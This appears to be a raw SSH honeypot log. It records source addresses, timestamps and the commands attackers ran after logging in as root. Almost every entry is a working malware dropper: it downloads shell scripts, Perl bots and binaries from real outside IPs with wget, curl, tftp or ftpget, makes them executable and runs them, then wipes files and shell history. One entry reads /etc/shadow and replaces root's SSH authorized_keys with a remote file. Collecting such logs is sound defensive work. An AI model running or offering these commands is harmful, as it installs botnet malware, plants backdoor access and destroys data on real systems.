Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.49.240.16/sensi.sh; curl -O http://185.49.240.16/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 185.49.240.16 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 185.49.240.16; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.49.240.16 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf * ; wget 35.203.175.171/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 35.203.175.171/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.49.240.16/sensi.sh
curl -O http://185.49.240.16/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp 185.49.240.16 -c get sensi.sh
chmod 777 sensi.sh
sh sensi.sh
tftp -r sensi2.sh -g 185.49.240.16
chmod 777 sensi2.sh
sh sensi2.sh
ftpget -v -u anonymous -p anonymous -P 21 185.49.240.16 sensi1.sh sensi1.sh
sh sensi1.sh
rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh
rm -rf *
wget 35.203.175.171/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 35.203.175.171/bot.pl
perl bot.pl
history -c
rm -rf bot.pl

From 157.230.80.53 29-Oct-2020 06:32:08 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec cat /etc/issue
cat /etc/issue

From 222.186.46.13 29-Oct-2020 12:27:03 ssh2 root
Exec echo 1
echo 1

From 34.80.219.76 30-Oct-2020 06:33:55 ssh2 root
Exec cat /etc/issue ; wget 120.48.8.77/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 120.48.8.77/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl
cat /etc/issue
wget 120.48.8.77/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 120.48.8.77/bot.pl
perl bot.pl
history -c
rm -rf bot.pl

From 45.153.203.172 31-Oct-2020 21:54:53 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.153.203.172/update.sh; curl -O http://45.153.203.172/update.sh; chmod 777 update.sh; sh update.sh; tftp 45.153.203.172 -c get update.sh; chmod 777 update.sh; sh update.sh; tftp -r update2.sh -g 45.153.203.172; chmod 777 update2.sh; sh update2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.153.203.172 update1.sh update1.sh; sh update1.sh; rm -rf update.sh update.sh update2.sh update1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.153.203.172/update.sh
curl -O http://45.153.203.172/update.sh
chmod 777 update.sh
sh update.sh
tftp 45.153.203.172 -c get update.sh
chmod 777 update.sh
sh update.sh
tftp -r update2.sh -g 45.153.203.172
chmod 777 update2.sh
sh update2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.153.203.172 update1.sh update1.sh
sh update1.sh
rm -rf update.sh update.sh update2.sh update1.sh
rm -rf *

From 37.46.150.243 1-Nov-2020 12:10:49 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.46.150.243/hentai.sh; curl -O http://37.46.150.243/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.46.150.243/hentai.sh
curl -O http://37.46.150.243/hentai.sh
chmod 777 hentai.sh
sh hentai.sh
rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh
rm -rf *

From 185.212.149.160 1-Nov-2020 12:36:44 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://107.175.94.18/Pumpkin.sh; chmod 777 Pumpkin.sh; sh Pumpkin.sh; tftp 107.175.94.18 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 107.175.94.18; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://107.175.94.18/Pumpkin.sh
chmod 777 Pumpkin.sh
sh Pumpkin.sh
tftp 107.175.94.18 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 107.175.94.18
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 159.65.115.115 2-Nov-2020 17:55:41 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://104.168.195.213/Thorbins.sh; chmod 777 Thorbins.sh; sh Thorbins.sh; tftp 104.168.195.213 -c get Thortftp1.sh; chmod 777 Thortftp1.sh; sh Thortftp1.sh; tftp -r Thortftp2.sh -g 104.168.195.213; chmod 777 Thortftp2.sh; sh Thortftp2.sh; rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.168.195.213/Thorbins.sh
chmod 777 Thorbins.sh
sh Thorbins.sh
tftp 104.168.195.213 -c get Thortftp1.sh
chmod 777 Thortftp1.sh
sh Thortftp1.sh
tftp -r Thortftp2.sh -g 104.168.195.213
chmod 777 Thortftp2.sh
sh Thortftp2.sh
rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh
rm -rf *
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 45.145.185.25 2-Nov-2020 19:19:56 ssh2 root
Exec wget http://45.145.185.25/we.sh; curl -O http://45.145.185.25/we.sh; chmod 777 we.sh; sh we.sh
wget http://45.145.185.25/we.sh
curl -O http://45.145.185.25/we.sh
chmod 777 we.sh
sh we.sh

From 167.71.177.87 3-Nov-2020 01:18:02 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://107.173.91.164/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 107.173.91.164 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 107.173.91.164; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://107.173.91.164/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 107.173.91.164 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 107.173.91.164
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *

From 213.142.137.25 4-Nov-2020 06:05:38 ssh2 root
Exec uname -a; cd /tmp; wget 185.82.200.52/n3;perl n3;rm -rf n3*
uname -a
cd /tmp
wget 185.82.200.52/n3
perl n3
rm -rf n3*

From 36.133.122.36 4-Nov-2020 19:13:31 ssh2 root
Exec wget http://45.145.185.25/wash.sh; curl -O http://45.145.185.25/wash.sh; chmod 777 wash.sh; sh wash.sh
wget http://45.145.185.25/wash.sh
curl -O http://45.145.185.25/wash.sh
chmod 777 wash.sh
sh wash.sh

From 45.126.132.175 6-Nov-2020 01:41:36 ssh2 root
Exec uname -a; cd /tmp; wget http://185.82.200.52/n3; perl n3; rm -rf n3
uname -a
cd /tmp
wget http://185.82.200.52/n3
perl n3
rm -rf n3

From 64.227.11.94 6-Nov-2020 09:45:40 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.175.136.157/Mercury.sh; curl -O http://107.175.136.157/Mercury.sh; chmod 777 Mercury.sh; sh Mercury.sh; tftp 107.175.136.157 -c get Mercury.sh; chmod 777 Mercury.sh; sh Mercury.sh; tftp -r Mercury2.sh -g 107.175.136.157; chmod 777 Mercury2.sh; sh Mercury2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.175.136.157 Mercury1.sh Mercury1.sh; sh Mercury1.sh; rm -rf Mercury.sh Mercury.sh Mercury2.sh Mercury1.sh; rm -rf *																			ROOT Payload:cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.175.136.157/bins/Mercury.x86 -O /tmp/Mercury; chmod +x /tmp/Mercury; /tmp/Mercury Mercury.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://107.175.136.157/Mercury.sh
curl -O http://107.175.136.157/Mercury.sh
chmod 777 Mercury.sh
sh Mercury.sh
tftp 107.175.136.157 -c get Mercury.sh
chmod 777 Mercury.sh
sh Mercury.sh
tftp -r Mercury2.sh -g 107.175.136.157
chmod 777 Mercury2.sh
sh Mercury2.sh
ftpget -v -u anonymous -p anonymous -P 21 107.175.136.157 Mercury1.sh Mercury1.sh
sh Mercury1.sh
rm -rf Mercury.sh Mercury.sh Mercury2.sh Mercury1.sh
rm -rf * ROOT Payload:cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://107.175.136.157/bins/Mercury.x86 -O /tmp/Mercury
chmod +x /tmp/Mercury
/tmp/Mercury Mercury.x86

From 157.245.135.79 7-Nov-2020 21:41:53 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://185.243.215.254/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 185.243.215.254 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 185.243.215.254; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://185.243.215.254/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 185.243.215.254 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 185.243.215.254
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 159.203.188.156 8-Nov-2020 02:59:19 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.95.215.12/Mercury.sh; curl -O http://23.95.215.12/Mercury.sh; chmod 777 Mercury.sh; sh Mercury.sh; tftp 23.95.215.12 -c get Mercury.sh; chmod 777 Mercury.sh; sh Mercury.sh; tftp -r Mercury2.sh -g 23.95.215.12; chmod 777 Mercury2.sh; sh Mercury2.sh; ftpget -v -u anonymous -p anonymous -P 21 23.95.215.12 Mercury1.sh Mercury1.sh; sh Mercury1.sh; rm -rf Mercury.sh Mercury.sh Mercury2.sh Mercury1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://23.95.215.12/Mercury.sh
curl -O http://23.95.215.12/Mercury.sh
chmod 777 Mercury.sh
sh Mercury.sh
tftp 23.95.215.12 -c get Mercury.sh
chmod 777 Mercury.sh
sh Mercury.sh
tftp -r Mercury2.sh -g 23.95.215.12
chmod 777 Mercury2.sh
sh Mercury2.sh
ftpget -v -u anonymous -p anonymous -P 21 23.95.215.12 Mercury1.sh Mercury1.sh
sh Mercury1.sh
rm -rf Mercury.sh Mercury.sh Mercury2.sh Mercury1.sh
rm -rf *

From 171.110.230.134 8-Nov-2020 05:18:51 ssh2 root
Exec echo "cd /tmp; rm -f *.sh; wget http://bpsuck.hldns.ru/wget.sh || curl http://bpsuck.hldns.ru/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
rm -f *.sh
wget http://bpsuck.hldns.ru/wget.sh || curl http://bpsuck.hldns.ru/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 159.203.188.156 9-Nov-2020 03:17:01 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.95.215.12/8UsA.sh; curl -O http://23.95.215.12/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 23.95.215.12 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 23.95.215.12; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 23.95.215.12 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://23.95.215.12/8UsA.sh
curl -O http://23.95.215.12/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 23.95.215.12 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 23.95.215.12
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 23.95.215.12 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 45.153.203.17 9-Nov-2020 08:21:23 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.153.203.17/bins/Mercury.x86 -O /tmp/Mercury; chmod +x /tmp/Mercury; /tmp/Mercury Mercury.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.153.203.17/bins/Mercury.x86 -O /tmp/Mercury
chmod +x /tmp/Mercury
/tmp/Mercury Mercury.x86

From 165.227.141.136 9-Nov-2020 08:33:12 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://104.168.195.213/Thorbins.sh; chmod 777 Thorbins.sh; sh Thorbins.sh; tftp 104.168.195.213 -c get Thortftp1.sh; chmod 777 Thortftp1.sh; sh Thortftp1.sh; tftp -r Thortftp2.sh -g 104.168.195.213; chmod 777 Thortftp2.sh; sh Thortftp2.sh; rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.168.195.213/Thorbins.sh
chmod 777 Thorbins.sh
sh Thorbins.sh
tftp 104.168.195.213 -c get Thortftp1.sh
chmod 777 Thortftp1.sh
sh Thortftp1.sh
tftp -r Thortftp2.sh -g 104.168.195.213
chmod 777 Thortftp2.sh
sh Thortftp2.sh
rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh
rm -rf *

From 51.159.166.212 9-Nov-2020 23:48:24 ssh2 root
Exec wget http://185.172.111.199:10293/ssh.sh?ARCH=$(uname -m) -O- | sh; curl http://185.172.111.199:10293/ssh.sh?ARCH=$(uname -m) | sh
wget http://185.172.111.199:10293/ssh.sh?ARCH=$(uname -m) -O- | sh
curl http://185.172.111.199:10293/ssh.sh?ARCH=$(uname -m) | sh

From 46.249.32.70 10-Nov-2020 07:18:15 ssh2 root
Exec wget http://185.172.111.199:10293/bot.x86_64 -O- > /tmp/.f; chmod 777 /tmp/.f; /tmp/.f
wget http://185.172.111.199:10293/bot.x86_64 -O- > /tmp/.f
chmod 777 /tmp/.f
/tmp/.f

From 212.129.29.208 10-Nov-2020 10:04:45 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://178.159.36.245/update.sh; curl -O http://178.159.36.245/update.sh; chmod 777 update.sh; sh update.sh; tftp 178.159.36.245 -c get update.sh; chmod 777 update.sh; sh update.sh; tftp -r update2.sh -g 178.159.36.245; chmod 777 update2.sh; sh update2.sh; ftpget -v -u anonymous -p anonymous -P 21 178.159.36.245 update1.sh update1.sh; sh update1.sh; rm -rf update.sh update.sh update2.sh update1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://178.159.36.245/update.sh
curl -O http://178.159.36.245/update.sh
chmod 777 update.sh
sh update.sh
tftp 178.159.36.245 -c get update.sh
chmod 777 update.sh
sh update.sh
tftp -r update2.sh -g 178.159.36.245
chmod 777 update2.sh
sh update2.sh
ftpget -v -u anonymous -p anonymous -P 21 178.159.36.245 update1.sh update1.sh
sh update1.sh
rm -rf update.sh update.sh update2.sh update1.sh
rm -rf *

From 67.207.90.208 11-Nov-2020 06:08:00 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.249.32.194/ByeBye.sh; curl -O http://46.249.32.194/ByeBye.sh; chmod 777 ByeBye.sh; sh ByeBye.sh; tftp 46.249.32.194 -c get ByeBye.sh; chmod 777 ByeBye.sh; sh ByeBye.sh; tftp -r ByeBye2.sh -g 46.249.32.194; chmod 777 ByeBye2.sh; sh ByeBye2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.249.32.194 ByeBye1.sh ByeBye1.sh; sh ByeBye1.sh; rm -rf ByeBye.sh ByeBye.sh ByeBye2.sh ByeBye1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://46.249.32.194/ByeBye.sh
curl -O http://46.249.32.194/ByeBye.sh
chmod 777 ByeBye.sh
sh ByeBye.sh
tftp 46.249.32.194 -c get ByeBye.sh
chmod 777 ByeBye.sh
sh ByeBye.sh
tftp -r ByeBye2.sh -g 46.249.32.194
chmod 777 ByeBye2.sh
sh ByeBye2.sh
ftpget -v -u anonymous -p anonymous -P 21 46.249.32.194 ByeBye1.sh ByeBye1.sh
sh ByeBye1.sh
rm -rf ByeBye.sh ByeBye.sh ByeBye2.sh ByeBye1.sh
rm -rf *

From 195.58.39.223 12-Nov-2020 08:40:09 ssh2 root
Exec wget http://104.168.195.213/Cipher.sh; chmod 777 *; sh Cipher.sh
wget http://104.168.195.213/Cipher.sh
chmod 777 *
sh Cipher.sh

From 195.58.39.249 12-Nov-2020 14:42:23 ssh2 root
Exec wget http://45.153.203.129/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 Roots; rm -rf Astra.* ; history -c
wget http://45.153.203.129/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86 Roots
rm -rf Astra.*
history -c

From 88.218.16.43 13-Nov-2020 23:25:35 ssh2 root
Exec wget http://88.218.16.144/we.sh; curl -O http://88.218.16.144/we.sh; chmod 777 we.sh; sh we.sh
wget http://88.218.16.144/we.sh
curl -O http://88.218.16.144/we.sh
chmod 777 we.sh
sh we.sh

From 167.172.131.7 14-Nov-2020 01:11:42 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://165.227.161.94/Sakura.sh; chmod 777 *; sh Sakura.sh; tftp -g 165.227.161.94 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c*
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://165.227.161.94/Sakura.sh
chmod 777 *
sh Sakura.sh
tftp -g 165.227.161.94 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c*

From 134.209.76.96 14-Nov-2020 19:09:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.249.32.194/bins/ByeBye.x86 -O /tmp/ByeBye; chmod +x /tmp/ByeBye; /tmp/ByeBye ByeBye.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://46.249.32.194/bins/ByeBye.x86 -O /tmp/ByeBye
chmod +x /tmp/ByeBye
/tmp/ByeBye ByeBye.x86

From 34.125.21.82 14-Nov-2020 21:31:53 ssh2 root
Exec nc 1 1; cd /tmp; cat /etc/issue;
nc 1 1
cd /tmp
cat /etc/issue

From 206.81.6.138 15-Nov-2020 19:04:22 ssh2 root
Exec wget http://92.42.45.227/bin.sh; chmod +x bin.sh; sh bin.sh
wget http://92.42.45.227/bin.sh
chmod +x bin.sh
sh bin.sh

From 206.81.29.232 16-Nov-2020 23:17:13 ssh2 root
Exec wget http://198.23.209.128/bin.sh; chmod +x bin.sh; sh bin.sh
wget http://198.23.209.128/bin.sh
chmod +x bin.sh
sh bin.sh
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 142.93.169.123 17-Nov-2020 07:04:00 ssh2 root
Exec wget http://198.23.209.128/bin.sh; chmod +x bin.sh; sh bin.sh
wget http://198.23.209.128/bin.sh
chmod +x bin.sh
sh bin.sh

From 167.172.38.93 17-Nov-2020 16:33:18 ssh2 root
Exec wget http://45.153.203.129/bins/Astra.x32; chmod 777 Astra.x32; ./Astra.x32 Roots.x32; rm -rf Astra.* ; history -c
wget http://45.153.203.129/bins/Astra.x32
chmod 777 Astra.x32
./Astra.x32 Roots.x32
rm -rf Astra.*
history -c

From 90.255.231.176 18-Nov-2020 19:55:05 ssh2 root
ls
ll
exit

From 165.232.45.141 19-Nov-2020 21:27:48 ssh2 root
Exec uname -a;nproc
uname -a
nproc
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 165.232.45.141 19-Nov-2020 21:41:21 ssh2 root
Exec uname -a;nproc
uname -a
nproc
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 68.183.72.81 21-Nov-2020 10:53:40 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.23.209.128/Beastmode.sh; curl -O http://198.23.209.128/Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp 198.23.209.128 -c get Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp -r Beastmode2.sh -g 198.23.209.128; chmod 777 Beastmode2.sh; sh Beastmode2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.23.209.128 Beastmode1.sh Beastmode1.sh; sh Beastmode1.sh; rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.23.209.128/Beastmode.sh
curl -O http://198.23.209.128/Beastmode.sh
chmod 777 Beastmode.sh
sh Beastmode.sh
tftp 198.23.209.128 -c get Beastmode.sh
chmod 777 Beastmode.sh
sh Beastmode.sh
tftp -r Beastmode2.sh -g 198.23.209.128
chmod 777 Beastmode2.sh
sh Beastmode2.sh
ftpget -v -u anonymous -p anonymous -P 21 198.23.209.128 Beastmode1.sh Beastmode1.sh
sh Beastmode1.sh
rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh
rm -rf *

From 161.97.64.180 21-Nov-2020 19:07:59 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec uname -s -v -n -r
uname -s -v -n -r

From 2.57.122.15 22-Nov-2020 00:11:32 ssh2 root
Exec grep 'cpu cores' /proc/cpuinfo | uniq
grep 'cpu cores' /proc/cpuinfo | uniq

From 167.71.64.214 22-Nov-2020 06:28:36 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.46.150.20/bins.sh; curl -O http://37.46.150.20/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.46.150.20/bins.sh
curl -O http://37.46.150.20/bins.sh
chmod 777 bins.sh
sh bins.sh
rm -rf *

From 218.76.215.4 22-Nov-2020 07:16:32 ssh2 root
Exec ping 8.8.8.8
ping 8.8.8.8
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 161.97.64.180 22-Nov-2020 09:39:04 ssh2 root
Exec uname -s -v -n -r
uname -s -v -n -r
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 171.223.110.188 22-Nov-2020 18:46:24 ssh2 root
Exec echo "cd /tmp; rm -f *.sh; wget http://46.246.41.29/wget.sh || curl http://46.246.41.29/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
rm -f *.sh
wget http://46.246.41.29/wget.sh || curl http://46.246.41.29/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 167.99.254.185 23-Nov-2020 06:36:55 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://45.14.224.77/Percocetbins.sh; chmod 777 Percocetbins.sh; sh Percocetbins.sh; tftp 45.14.224.77 -c get Percocettftp1.sh; chmod 777 Percocettftp1.sh; sh Percocettftp1.sh; tftp -r Percocettftp2.sh -g 45.14.224.77; chmod 777 Percocettftp2.sh; sh Percocettftp2.sh; rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://45.14.224.77/Percocetbins.sh
chmod 777 Percocetbins.sh
sh Percocetbins.sh
tftp 45.14.224.77 -c get Percocettftp1.sh
chmod 777 Percocettftp1.sh
sh Percocettftp1.sh
tftp -r Percocettftp2.sh -g 45.14.224.77
chmod 777 Percocettftp2.sh
sh Percocettftp2.sh
rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh
rm -rf *

From 8.9.15.68 24-Nov-2020 21:48:27 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://5.189.188.163/slumpbins.sh; chmod 777 slumpbins.sh; sh slumpbins.sh; tftp 5.189.188.163 -c get slumptftp1.sh; chmod 777 slumptftp1.sh; sh slumptftp1.sh; tftp -r slumptftp2.sh -g 5.189.188.163; chmod 777 slumptftp2.sh; sh slumptftp2.sh; rm -rf slumpbins.sh slumptftp1.sh slumptftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://5.189.188.163/slumpbins.sh
chmod 777 slumpbins.sh
sh slumpbins.sh
tftp 5.189.188.163 -c get slumptftp1.sh
chmod 777 slumptftp1.sh
sh slumptftp1.sh
tftp -r slumptftp2.sh -g 5.189.188.163
chmod 777 slumptftp2.sh
sh slumptftp2.sh
rm -rf slumpbins.sh slumptftp1.sh slumptftp2.sh
rm -rf *

From 157.230.116.109 25-Nov-2020 20:19:18 ssh2 root
Exec wget http://198.23.209.128/ytbins.sh; chmod 777 ytbins.sh; sh ytbins.sh; tftp 198.23.209.128 -c get yttftp1.sh; chmod 777 yttftp1.sh; sh yttftp1.sh; tftp -r yttftp2.sh -g 198.23.209.128; chmod 777 yttftp2.sh; sh yttftp2.sh; rm -rf ytbins.sh yttftp1.sh yttftp2.sh; rm -rf *
wget http://198.23.209.128/ytbins.sh
chmod 777 ytbins.sh
sh ytbins.sh
tftp 198.23.209.128 -c get yttftp1.sh
chmod 777 yttftp1.sh
sh yttftp1.sh
tftp -r yttftp2.sh -g 198.23.209.128
chmod 777 yttftp2.sh
sh yttftp2.sh
rm -rf ytbins.sh yttftp1.sh yttftp2.sh
rm -rf *

From 167.71.70.154 26-Nov-2020 21:22:51 ssh2 root
Exec rm -rf Astra.x86*; wget http://45.145.185.74/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86; rm -rf Astra.x86
rm -rf Astra.x86*
wget http://45.145.185.74/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86
rm -rf Astra.x86

From 149.28.165.20 26-Nov-2020 21:37:20 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://208.123.119.159/virginbins.sh; chmod 777 virginbins.sh; sh virginbins.sh; tftp 208.123.119.159 -c get virgintftp1.sh; chmod 777 virgintftp1.sh; sh virgintftp1.sh; tftp -r virgintftp2.sh -g 208.123.119.159; chmod 777 virgintftp2.sh; sh virgintftp2.sh; rm -rf virginbins.sh virgintftp1.sh virgintftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://208.123.119.159/virginbins.sh
chmod 777 virginbins.sh
sh virginbins.sh
tftp 208.123.119.159 -c get virgintftp1.sh
chmod 777 virgintftp1.sh
sh virgintftp1.sh
tftp -r virgintftp2.sh -g 208.123.119.159
chmod 777 virgintftp2.sh
sh virgintftp2.sh
rm -rf virginbins.sh virgintftp1.sh virgintftp2.sh
rm -rf *

From 142.93.252.89 26-Nov-2020 23:17:25 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.175.57.119/sh; curl -O http://107.175.57.119/sh; chmod 777 sh; sh sh; tftp 107.175.57.119 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 107.175.57.119; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 107.175.57.119 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://107.175.57.119/sh
curl -O http://107.175.57.119/sh
chmod 777 sh
sh sh
tftp 107.175.57.119 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 107.175.57.119
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 107.175.57.119 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 103.21.117.92 27-Nov-2020 00:10:07 ssh2 root
Exec uname -a;id;cat /etc/shadow;chattr -ia /root/.ssh/*;wget http://tung-shu.cf/authorized_keys -O /root/.ssh/authorized_keys;wget -qO - http://tung-shu.cf/o|perl;wget http://tung-shu.cf/x -O /tmp/x;chmod +x /tmp/x;/tmp/x;rm -f /tmp/x
uname -a
id
cat /etc/shadow
chattr -ia /root/.ssh/*
wget http://tung-shu.cf/authorized_keys -O /root/.ssh/authorized_keys
wget -qO - http://tung-shu.cf/o|perl
wget http://tung-shu.cf/x -O /tmp/x
chmod +x /tmp/x
/tmp/x
rm -f /tmp/x

From 82.165.236.132 27-Nov-2020 06:55:50 ssh2 root
apt-get install postfix
service postfix restart
yum
/etc/init.d/postfix restart

From 134.209.249.245 27-Nov-2020 21:34:50 ssh2 root
Exec wget http://45.14.224.42/yoyobins.sh; chmod +x yoyobins.sh; sh yoyobins.sh
wget http://45.14.224.42/yoyobins.sh
